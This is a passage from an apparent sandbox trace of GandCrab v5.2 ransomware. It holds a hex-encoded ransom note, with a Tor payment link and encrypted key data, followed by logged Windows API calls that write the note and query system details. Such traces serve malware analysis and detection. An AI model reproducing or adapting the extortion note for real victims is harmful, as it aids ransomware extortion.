(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.794] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0069.795] CloseHandle (hObject=0x2bc) returned 1 [0069.795] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.796] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.796] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x6a)) [0069.796] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.796] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.796] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.796] wsprintfW (in: param_1=0x25d0000, 